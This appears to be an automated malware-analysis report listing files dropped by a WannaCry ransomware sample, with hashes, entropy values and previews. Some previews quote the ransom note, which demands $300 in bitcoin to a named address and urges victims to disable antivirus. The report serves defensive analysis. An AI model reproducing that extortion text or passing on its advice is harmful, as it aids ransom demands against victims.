                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998395844064861
                                                  Encrypted:true
                                                  SSDEEP:3072:YZ3QGlCdIuI9LZXdLVl9ERrujqamdGulzmApndNBI:YGGduI9VXdLVgaCtVdNBI
                                                  MD5:BA9F8069B91187A9C959D395B88E043E
                                                  SHA1:E5AE9CAB771DF155664D9FAEF7EBF3FC9CEA55AD
                                                  SHA-256:D8CCE2ADC2DAF19E0B574531D802D0013A87DE93696134C9E788C0A986928652
                                                  SHA-512:87FE38124E5FE0E1EC78FE0CA7469065F12212AF9FF08727C5E5DD119639C5D5CC8EAB26478D8FE2B3BAEE42741AA8A64711458CEA9DA8C0020DDD8A9DA3E413
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):111896
                                                  Entropy (8bit):7.998277506079741
                                                  Encrypted:true
                                                  SSDEEP:3072:IetzI9nslYegg24MDfNWtS1l1MaJG8L7+WTm:IcunS0UtS1DMeGKy
                                                  MD5:DA9B6D9DA80F8C4413EA37357608C442
                                                  SHA1:7BABFEA22847A82ADCE61424E2BB901765428C31
                                                  SHA-256:B9F9B6F683CE2899E6A7F714197BBD3A555C879EDCF16AF273103B3BD315AA80
                                                  SHA-512:8095BF253BC784988F8242E33F75FA4ED8BC307CA6F2E9400C35C8455E17277E12C76BEE15DDD98531FA8CCC9DBF78AC607439C8A283BF1E59D306ADB0DFAACC
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.9998300252662045
                                                  Encrypted:true
                                                  SSDEEP:24576:MAwRu3/VCZ6rYJvqu/D+PKxUPys+5BTndMod/tN+2B:MAwR6/VAMkqub+QuysaTeqP
                                                  MD5:CA6069142F6CBAD8679ED9E20FE9FB95
                                                  SHA1:E9B08DC42D4A87DAAB68DF8DB4E97026E40ED1CF
                                                  SHA-256:1D919FBF3DE33CADA8FDBB7C52BD7D0655636917A753BB0085DCEA86C12C0063
                                                  SHA-512:CB39A0166284F6EFA3D4D1B18B87A77A33C50D7438DF4C9F6CD13F469603DC0EE1D1D439234223376E44307B387668CD184D2AD00F5B1C9B809F2D528B8C1343
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1048856
                                                  Entropy (8bit):7.99983740974304
                                                  Encrypted:true
                                                  SSDEEP:24576:CCMoQ+p0A/kIrYWfIfm/TeevnT0eF9Njrd:CC8DIrYcIyJnTNZjrd
                                                  MD5:3328E8CA5C1C64A3BA8085C6E6FB38A8
                                                  SHA1:C0E2C1A53BE9444459F9645A975F4BD9C2F1E2FD
                                                  SHA-256:D8538559AD03041DA0FAA145EA78AD9BBA48B24EA3084FFA6ACF593BB2856AB1
                                                  SHA-512:231DBAE1F6DE8EC2AE62A7A2D1340E03E5F437D38132511B8545A6BD2D844CBAE5CAF7E84828DDD79F9DD81255A06C008432E79A39D568FD73DCC130F099952C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3656
                                                  Entropy (8bit):7.948008681028875
                                                  Encrypted:false
                                                  SSDEEP:96:oys/MDUE7IQXRmAdZSzd3h+zwShdyFc6EskpdPb:d4LE7FRyzdTtFodj
                                                  MD5:B72B630062CA8B3B3AAA8188B5B45893
                                                  SHA1:34EDF81DE205F709C218609135667DE8241BB3D6
                                                  SHA-256:3BE20D2BD26B433AD437CEA7C7431E21CB9D11971680B4C00FA021B2288F6C34
                                                  SHA-512:99D2CB08076F525BA11AC2773405AD24E9F494E17545CAD2AD45547F1156E9E5D20B5E54AFC6A2D0E7524AF9BB02653AF3B213BA04C5F30E7446DF095287AB5B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.442528140001084
                                                  Encrypted:false
                                                  SSDEEP:12:bkE4yaF2xvOPIcSNnCZchM+yqYNRFX1jKn:bkeGOmPSNnCAclE
                                                  MD5:7CD22638C99FBA8756CB59B74944B81F
                                                  SHA1:667C36D9DBE6EA6A3080C9425ADE6673BD54FCCE
                                                  SHA-256:003A244375441FDBB7DABD73CBF939A61ABE882D0A2EC66991CB0A8DDDA3C920
                                                  SHA-512:076167D9A2874C998AFE359C6B5EF2F3F502A73A043C9F4A3D61B56A761B3A642AD2FB0624EEFF49704346F26F1D989FF62E10ABD759B8A799DA65D59A4FA71E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.337159390339733
                                                  Encrypted:false
                                                  SSDEEP:6:bkEOIBkhkXjhHOpnegpkZrloD2WxEuidCb6lyjeSoQG+MqtgKD+CFHsrkubibJom:bkEOIBkKHypkZru1xcCLqSfMqtgTC9aW
                                                  MD5:E5EDAB2D60A9AF82A70FB644AF6DF797
                                                  SHA1:2F4BE4544D651BA82940AACC3E12B7905C64A905
                                                  SHA-256:9532C1C24290D80AF07902756649A926F1A898696883EC521A9A5E68EB3DB3C8
                                                  SHA-512:F7EFDDB0881303C37BA4B82CE1874F644D44DE03AE852F69C1C8C59C724AD774BA7A9F741EBFD4943BC54A21D7194E825F3451344818A6160B1FC3B3B2DB9F7A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3496
                                                  Entropy (8bit):7.945077767566454
                                                  Encrypted:false
                                                  SSDEEP:96:orbJapT7RSgbEXptc7zYK/lq8SlFJrVhFVEtsozRS5EZ8Q56F1:OJav/Qtc7zYMq5FdVhFe23S8QYF1
                                                  MD5:BA972405EDB380AACE73036257C7351B
                                                  SHA1:B09912815E94A68851FEDE86340ABE8DE814815E
                                                  SHA-256:47D2113B0106A81832139520284C79D5D29BECBB76D8F647B31952E6DCB2C4B3
                                                  SHA-512:503AF5AE4851D48A8F07FBB3E38097C697AF9A491050E4FB5F66755D9A66B67DAB092F4C0BAF1F7E872B8C97263413556E1418243DCD8A6BEC23EAA392BF9175
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):424
                                                  Entropy (8bit):7.427969040817298
                                                  Encrypted:false
                                                  SSDEEP:12:bkEz4T/AQtDFzZKUpRteLDpD/7bTcFy0o5LD7f:bkA+pFzZlaLD1fTc1oZ
                                                  MD5:E659F6299034E0F59205E43BBDF27894
                                                  SHA1:7E9C2A8BFB92AF4BEA39179C79B2CEAE3F9D5457
                                                  SHA-256:1A18EA98F1861AE0F0907E29D6D75E263311DEC105662696550F89CE658FE0F4
                                                  SHA-512:7E12C0E48F703813548E2E8856D27757BE026AFBDBB1D217E9DA96758FB69F5CBFF56007EF75C513F5E28FEF025FEC703B0E9F2D7CD05572CE36797122F093C3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.345775413138981
                                                  Encrypted:false
                                                  SSDEEP:6:bkE0djGN4JTNH87qI8Y23zqcllQcT17Z7HInOfoO/IXJa+3vaNoydbvhkz0dlXYn:bkEEGN4j87qI8b3ucljphHInOfG5a2ZV
                                                  MD5:AF5346E6E9D0D52C5CEF0319E97417BB
                                                  SHA1:9B34F567C767DDE22FB8EA1511454927F5C1D5B9
                                                  SHA-256:9EE8DDE93F4BC8A28D2D6694D4B78D65E55B19AEB62587C0B8B8F371871F2846
                                                  SHA-512:E05E5C67B1C2995D84DDEE7AB008A973A445F02BBC04B194EB9842A9BDE7A643F5D002D1B041DCEDA4B86516AA8484FD3F05419D31569E998BF8AEDA80B4C849
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4200
                                                  Entropy (8bit):7.958160411774594
                                                  Encrypted:false
                                                  SSDEEP:96:okEwimMschbEhjdgYNLFklyLN+eWswfSo1pcyv:zEfmqhbEhjdt6oN+XTxsyv
                                                  MD5:553C4143A164A1585F93DF90D82E5FAB
                                                  SHA1:BB3BF18DA1D5D08AA88E447A7DE26EB99E9F8913
                                                  SHA-256:5D5D44B3ABDFDC30516A6EC0BB1884CCF4CAF8C8ECFF3332B321479865A51A5C
                                                  SHA-512:AFE1C913E28E08EBA95EDBE43395FF00CA706CE23C1CC71E814814D7ABE1B39139F54DEA7A0381A35474C6B59DEB021B9B05011FBF3A1AD2EDA8592E95BC4D9F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3688
                                                  Entropy (8bit):7.949644833586689
                                                  Encrypted:false
                                                  SSDEEP:96:o3te+1obWAOZe5i94fV5EsdTY4tSJrB9iZoNHFVLvfHA13May:Yt11UWh+EsqxB8ZYDLw139y
                                                  MD5:795CC8EB62F12C04C883D6D508109BB6
                                                  SHA1:E1A68A134F2F8D955274CC4B9B6D144477C4ACA7
                                                  SHA-256:2450005FD832E5C90D6C86CB4AB8BE2BB33B81577F827FDD6D7FF361D163C61C
                                                  SHA-512:602AB1D1C682EA392B7A9F6F1CAC9A2F6D9E28888A349CCF768B29FC742B1258A14AC4B613F1A18C85569C319758DD7CF327B713C3B112363A78473F8F686643
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):3688
                                                  Entropy (8bit):7.948892727004841
                                                  Encrypted:false
                                                  SSDEEP:96:oJklJ9BomhJnx9vh+BBtbas6RV6adEdOKF:Fb9BosxPpobasG6aep
                                                  MD5:239464DB7DDE0FAAB6296AADB8D6E67C
                                                  SHA1:8D85E4ACAC5B584A5EA267F2DB3AE46EF16BE56D
                                                  SHA-256:9307FB788A41ADAF7CCD6A57C6780CE979E4C56793C27E2D77ACB1D811466580
                                                  SHA-512:8E9B94D1D47915670F4D3C6888E9469BC575AD337F6B75399165ABFAEA0AD55EF2588755DDA4896FE99848B60EF07C4BE1118363305E0A0CF1D577822F1C05A0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.418526675257306
                                                  Encrypted:false
                                                  SSDEEP:12:bkEbDVvyO4pvdpuBxi5PtYHKjCHcS3F5JxoFv:bkMVvX4pvTcOPtAKjC8UF5JxU
                                                  MD5:A46213F5577DBBF0C4D499B71E566DE9
                                                  SHA1:F432C0A7D30D66A52DB692F3EA53844C7542B860
                                                  SHA-256:BD53D0EBAF56A87124B780DCE2EC0E42E78A7CB9032B3163A80C536487783745
                                                  SHA-512:5AA6023009AA2DB7A951C45941A289C98EA680A226BEB592D865F8DEBB376922C4D22FB46F024BDA919C35E2D927D35EB072A4203698FA852553532C835E2ADF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.359725180420463
                                                  Encrypted:false
                                                  SSDEEP:6:bkEXp0QsdWET67JuTmtVCUhoRXHYzP6eo5p+jqyEsvjZo5gqbEKWXyPT2MpeIf:bkEXp0jdmRtVphKXUP6l5p+jqtsaqqbF
                                                  MD5:92E91A7047652C65838BBB34BD46278D
                                                  SHA1:2769B4BA26979D5009748CDA6906E119D6B8A7A9
                                                  SHA-256:68CED54483DEE11E86F5B8631D6DE4F102752CC39D23FF2DB04DBC898F661C34
                                                  SHA-512:404531F1DCD928A7DA8E64F86FBC7D611701FB8D09F7DB369DC1DBEBF9DBEFB213C526C49F45AC5A0F9F3287728A810A172758729C429D60E4181784BC6FB9DD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5272
                                                  Entropy (8bit):7.965488862334102
                                                  Encrypted:false
                                                  SSDEEP:96:oOv/+LuxHIWr9NIVh6dSVqQLp/IFHcnK1oqfSfhC87uGtleDbTJrKt7BOOy5DC/O:9rx7M36m6pGKaKSfg8nwTsWLrP
                                                  MD5:D58A813FDC97A6FCFDF9DA34BF4A0FB5
                                                  SHA1:C9B681092EDD9B7705394076C38708DD9B269BEB
                                                  SHA-256:EA33911144FDBC0E70721D14B8AE2544C723DC52816447F08542DD2F9FFA1463
                                                  SHA-512:70BF9DE8486AF5AEC8CC285C91E45F051C10280803B367B320310ECB8E2EDD1B001980ECD32FAD8F941FA77BFC6A195D4E6748F81B2813D7EAB4BD9EFFB63A03
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):63944
                                                  Entropy (8bit):7.9971548536712005
                                                  Encrypted:true
                                                  SSDEEP:1536:RSX9jxi9/KMFT0ZdKenHNLCGyc7DWNZmNPb2XyIMVXMtRRQ:RS1xi9SMmKCtLty4kw5xXak
                                                  MD5:5D3CC0477FF4C902D9E7508CBE2B6C76
                                                  SHA1:03C9FDE932323DF2254D1A2A8F850696122A035B
                                                  SHA-256:F2C21480C2CEBC3241FFDBB4303B0BFD8B78DD8A89858B78339E3CF137ED296C
                                                  SHA-512:E81348BF5699D24415A4782068FF4531F09CABB5F835B9C12A861112E33B5ECF1A12001508F379D8F93E42BD8DC552B41654486D45B3A8FCDB47DEB73A35690A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):520
                                                  Entropy (8bit):7.561408031862071
                                                  Encrypted:false
                                                  SSDEEP:12:bkEebdkWKbYRxD5gN0g/Ve1EadGjREJ3Jr7v17pgAHqlhR:bkrqR6k0FrdGjREJp7N9ggMR
                                                  MD5:74F12110A48CC12B4109503BAA181FCF
                                                  SHA1:ED4EAF3625F3164B37E81FB23CB7C161134F1119
                                                  SHA-256:4375005031785B4F0D18F5C5EC184D278BD323E959C86246BDB4CD0CE8F1734A
                                                  SHA-512:0D3C0E8ECD94FB011F703BE4A8A9A5FE1BAE9D26414F4E6D70731831792F16B9B2756D5B56EB4C42D692052CEE617B057E9DCC4254CA36A7BF3911F7DC5D6045
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY! [binary data]
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):544936
                                                  Entropy (8bit):7.9996523124749555
                                                  Encrypted:true
                                                  SSDEEP:12288:7OIVzFqqwqv+yYefk3qw73Gd4nc+Vfo1Aw6K9HQT:7tBqTq2hlTDcN1AlK9wT
                                                  MD5:A3A9832325D99E13B3323FFDF0022E53
                                                  SHA1:AA49C63F5EB6D94A47CDC0509941BE310BA12227
                                                  SHA-256:57987DC400A0C577119075A80C6B4FBD0C22838AD759A4A73BB453D24B2942D9
                                                  SHA-512:4C7F1C1687A7AEB3F76C54E0EBD562C51965EE5376817B0FAE8340ED808F17EABB8A3F1183B1298082EA5AD3D9068A54C9D389D6CA691797B705CFE291317883
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):261608
                                                  Entropy (8bit):7.9992668670741836
                                                  Encrypted:true
                                                  SSDEEP:6144:kHqIXtPuJ4+wbcRx0DH4or6UWqzNhCgIQA1VKIc1VYqLR9XXJbtcQg:kVX84rAX0DYor1hhCgDAfZc1VYmXRt1g
                                                  MD5:C01E7A6072142811572B03100EF90802
                                                  SHA1:F0D069E86232C137ADE078C71AC44181639C09A4
                                                  SHA-256:02E420687A6F9280EF96E208ADE2A35AA01C935ADD5244117A36C9CFDEBCC8F5
                                                  SHA-512:FCE74BB7D5B2F565D25A4DD430EC56A0FDAB86DCB17C3EA8F00BBB56AD182773F636B7F82536B057C6EED1488DC21B1335FCBB903C93DE16407BAF5A12D4F7D3
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):70648
                                                  Entropy (8bit):7.9976071454342375
                                                  Encrypted:true
                                                  SSDEEP:1536:tMr5REwM0IOCSDhufj/cMvruiqLylD+gVg9yeoCwDSLdqkCIWF:iNCpOb+jDvcUDdg9yeE2dLCIWF
                                                  MD5:3ACDA06518829D1FDBB99EC40EB559F8
                                                  SHA1:61682B26535D5E6D035FA682C46005938A8D8159
                                                  SHA-256:EE0CF8F58C6E832B090993A234F0592441F595FBF5B5738A646B3C2768CAD469
                                                  SHA-512:2024B07D3ECB70E8FFCB6CAEB7F7D181A9504F1DEC5AEAA1B4D0CC82724CC0BFE10B18471FD0FD5C04C3BC3C95DC49B4EA16372AB64488A054DA30A3F55B969F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):4648
                                                  Entropy (8bit):7.958976793710235
                                                  Encrypted:false
                                                  SSDEEP:96:oB9It7blUb4hzavn5GpdBhCUnw7VXE8uUHjqQavqsSOd589Ww:C9Iob4hWm7w1E8uejqQsSM89
                                                  MD5:56E6A5C1788CA51FABB2DECB9EC094AC
                                                  SHA1:A4D3C700CF0A47F876DBD261BCDDF9E387112F35
                                                  SHA-256:4B58E1C337600F238D2B48C73BE13A4D1E18657820CDC26DD2AF0C5A15717E3F
                                                  SHA-512:A8B8377DC76BC0CC248930DFC8EB5719090FBBC393318019A2DDE801398E47AD9EC055AECB84B047D6BE6D929342C6FF79BBEAD18FE1DDEA741D8A91430C310D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):840
                                                  Entropy (8bit):7.765386388783059
                                                  Encrypted:false
                                                  SSDEEP:24:bk2xLo+m2NPRUHgSeuKpNr4TZW5yDvpZAG1vjDtc:bk2xkYNPRUWFp54Tsy8
                                                  MD5:949AFF577FD4C6A677BBA6DEBEBFBBDB
                                                  SHA1:81AD6C9253AD036756E82C63EED1F521EFF04D09
                                                  SHA-256:41BA789BD7F7A175C490E903E172E7072F0C65CBAE3FD7D1E7EECFE6FD86F963
                                                  SHA-512:75FA44B6E4C9F982F75F085ED576E6210BF887A87596266AFA67E4A2B3AB562A3CCD4269698B3EF4B8B096FAD3F8DE7E09DD2EFB1A0B70777486944508FFF444
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.492683926355241
                                                  Encrypted:false
                                                  SSDEEP:12:bkEwShSV4iSlQsQfPhRemOBUnT0/FxFQgff4Zww65kn:bkNQSV4iS6sGh8mO24/HCgUww65k
                                                  MD5:1DEAAC0183F9993C789E86029DD820E9
                                                  SHA1:07F5F6FA3E7D9D789C180020EC0E728D9DE53467
                                                  SHA-256:964E02A65D849E35C1CB637A79C2D64696243D78162B25561502FBD294C68D70
                                                  SHA-512:D97D7886954F90B73F7EAEB8820E76FC601B1FDFE0547730CD3A1846FD16B07411CBF1B5A87BC78CFCAC455602320E5A7E469FA58D672B9B561F22A7592E924B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):536
                                                  Entropy (8bit):7.6338147758933514
                                                  Encrypted:false
                                                  SSDEEP:12:bkE4faKF+32a2MQ3uL8WbWo750LSnIVfTjYw2UbCD55vn0Vd:bkRft+3c6srSnIJXYwWtMd
                                                  MD5:4A7BA20B96F1A94A6002C8200FB384F3
                                                  SHA1:65ECF1CAE709B3CA193B5ED4F23891F29CA3A985
                                                  SHA-256:F20FB414ED16A15F019377DC1EE1ECF28BB30A049BF2200683ABBD7F714DAA26
                                                  SHA-512:40EE64D5DFA4CE69493D942C20A52459AE71D93CD38DD6E33E2AB06613A7AE32ABDF5365F9FD2EC5EB896981B0EA2C2B952089D5C0353CC16371045032F2AA95
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.396376988895496
                                                  Encrypted:false
